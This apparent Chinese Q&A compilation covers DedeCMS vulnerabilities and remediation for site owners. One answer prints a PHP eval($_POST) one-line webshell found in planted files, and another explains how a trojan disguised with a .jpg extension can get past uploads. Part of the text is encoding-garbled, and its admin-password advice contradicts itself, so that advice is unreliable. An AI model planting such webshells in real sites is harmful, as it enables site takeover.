本文目录一览:
- 1、DedeCms漏洞太多了,连bluehost都禁止使用了,如果学会了PHP,可以查找和解决这些漏洞
- 2、怎么解决DEDECMS的漏洞问题
- 3、dedecms的漏洞:Dedecms的隐患如何预防风险
- 4、如何解决织梦cms最新版本5.7漏洞被挂马的方法
- 5、有没有修复dedecms漏洞的软件
- 6、dedecms v5.7 漏洞 图片不能上传
DedeCms漏洞太多了,连bluehost都禁止使用了,如果学会了PHP,可以查找和解决这些漏洞
你想得有点简单了。
举个例子,你可以找个有经验得php程序员,问他是否能解决dede的漏洞,如果他说能,你让他试一试,保证不出一个星期他就会放弃(一般的情况下别人都会拒绝你)。因为你解决了这次的漏洞,以后还会出新的漏洞。
漏洞这东西就好比病毒,你解决了病毒,网络还会出新的病毒,这也是杀毒软件频繁更新的原因。
怎么解决DEDECMS的漏洞问题
如果
你是新手的话
建议关闭注册功能
或是进行相关限制
如果不是新手
你可以把问题反映到织梦的官方论坛
看看他们官方人员是怎么解答的
dedecms的漏洞:Dedecms的隐患如何预防风险
�谌莺苌伲�赡苄慈氲氖焙虿皇呛芊奖悖�还�庑┐�氲淖饔萌肥挡恍〉摹�edecms一直是很火的建站cms,主要得益于两大站长网的鼎力支持;不过,人火是非多,cms太火了同样会被别有用心的人盯上。我的网站一直在使用dedecms,前段时间又一次受到攻击,攻击的目的很简单,那么便是黑链,知道后稍微修改下代码就恢复了,不是很严重;这段时间网站又被莫名上传文件,类似前一次,虽然对方还没来得及修改网站模板,不过这说明网站安全防患还未到位,对方任何时候都可能再次取得管理员权限,所以要特别注意网站的安全防患措施。因为我比较喜欢寻根究底,所以就去网上找了一下相关的资料,发现这确实是dedecms的漏洞,黑客可以利用多维的变量绕过正则检测,漏洞主要发生在/plus/mytag_js.php中,原理便是准备一个MySQL数据库来攻击已知网站的数据库,通过向数据库中写入一句话的代码,只要成功写入,那么以后便可以利用这些代码来获得后台管理员权限。结合我的网站被攻击已经别人类似的经历来看,黑客写入的文件主要存在于/plus/文件夹下,目前已知的几个文件包括ga.php、log.php、b.php、b1.php等,文件的特征便是短小,内容很少,可能写入的时候不是很方便,不过这些代码的作用确实不小的。下面这是ga.php文件中的部分代码:titlelogin/titleno?phpeval($_POST[1])?titlelogin/titleno?phpeval($_POST[1])?titlelogin/titleno?phpeval($_POST[1])?实际的代码比上面截取的要长,不过都是这段代码的重复,至于log.php的代码,同这个类似,只有一句话,简单明了,如果你对网络安全稍有了解,那么会知道?php eval($_POST[1]);?是php一句话木马,使用部分指定的工具可以执行这段代码,预计是破解密码的功能。既然已经知道对方是利用什么样的漏洞,同时知道对方利用什么样的原理来利用漏洞,那么要怎么预防这些危险的事发生呢?经过查询大量的资料,我初步整理出下面这些预防漏洞被利用的步骤,希望对同样适用dedecms的站长朋友们有所帮助。一、升级版本打好补丁设置目录权限这是官方对此的解决办法,不管你使用的是什么版本的dedecms,都要及时在后台升级版本自动更新补丁,这是避免漏洞被利用的最重要的一步;同时官方还提供设置目录的方法,主要是设置data、templets、uploads、a为可读写不可执行权限;include、member、plus、后台管理目录等设置为可执行可读不可写入权限;删除install及special目录,具体如何设置见官方说明。二、修改admin账号及密码黑客可能是利用默认admin账号,随后推测密码来破解的,所以修改默认的admin账号非常重要,至于如何修改,方法很多,比较有效的是用phpadmin登陆网站数据库,找到dede_admin数据库表(dede是数据库表前缀),修改其中userid及pwd两项,其中密码一定要修改成f297a57a5a743894a0e4,这是默认的密码admin;修改后去后台登陆,登陆dede后台后修改密码。三、别的值得注意的地方至于更多的细节,同样要注意,尽量别选择太廉价的空间,太廉价的空间很容易出现服务器本身的安全问题,只要服务器出现问题,整个服务器下面的网站都没救了。还有便是,如果没必要,尽量别开通会员注册什么的,使用起来很麻烦;至于网站后台目录,不要写到robots.txt里面,同时每个月至少换一次,管理员密码什么的同样要更换,避免和别的账号密码相同被推测出来。
如何解决织梦cms最新版本5.7漏洞被挂马的方法
织梦的漏洞大多来自它的插件部分(plus),那我们就从这里着手,我们把里面不需要的插件的php文件统统删掉,只保留自己用的上的友情链接,广告系统等,现如今有被所有的“黑客”抓住不放的两个漏洞(mytag.php,download.php)把这两个文件删了,如果你已经中马了,请打开数据库文件,找到这两个数据表,将表里的内容清空!另外到织梦后台,有一个病毒扫描的工具,在系统设置里,点击扫描一下你的网站文件,这样可以把非织梦文件扫描出来,然后删除掉即可!
织梦网站被挂马工具批量挂马
dedecms的系统漏洞,被入侵的话,常见是在data/cache、根目录下新增随机命名目录或数字目录等目录有后门程序。另外,站长要定期维护网站的时候,通过FTP查看目录,根据文件修改时间和名称判断下有无异常。在近期修改的文件中注意筛查,找到批量挂马程序后,一般是个asp和php网页,在FTP工具里,点右键选择“查看”源文件后确认删除。
找到挂马页面批量清理
一些挂马程序会提供织梦后门,在浏览器中输入你的域名/目录/挂马程序的文件名,出来的页面一般要求输入密码,输入刚才复制的密码,进入批量挂马工具。在这个工具里,功能很多,有提权,文件管理,文件上传,批量挂马,批量清马等等。我们可以用这个“批量清马”功能来清楚网站上的挂马代码。查看下挂马代码,复制到批量清马工具下面的输入框里,点开始就可以了。
网站重新生成html静态页面
dedecms本身自带的生成html功能来清理挂马代码,把整个网站重新生成一遍,代码自然就没了。不过这个方法只适合没给php文件挂马的情况下使用。假如php文件被挂马的话,这个方法是没用的。
有没有修复dedecms漏洞的软件
您好,朋友。跟版网团队很高兴为您解答:
首先织梦的官方补丁是最好的修复dedecms漏洞的工具。(可在后台在线打补丁)
如果你是虚拟主机用户的话360有提供一个专门织梦漏洞防护插件。
如果你是独立主机用户的话可以在主机上装一些防护软件比如安全狗,360主机卫士等防护软件。
希望我的回答能够帮到您。
dedecms v5.7 漏洞 图片不能上传
不润许的,也不建议啊,我虽然不知道你为什么非要把图片放在根目录,但我觉得这样会给安全方面带来很大的危害,为了不让用户得到更大的权限一般将附件文件价的属性设置成不容许执行脚本,而你如果将图片设置的可以上传到根目录,根目录必须的有可以执行php脚本的,这样如果有的用户将php木马伪装上传到你的根目录就会对你的网站有所有的权限,虽然dedecms已经对用户上传的文件做了限制,只容许图片格式的文件上传,但也只是从扩展名上做一下简单的判断,如果木马起一个jpg或其他格式的扩展名就可以上传上来,再利用iis漏洞就可以得到执行。从而获得你的网站权限。希望对你有所帮助。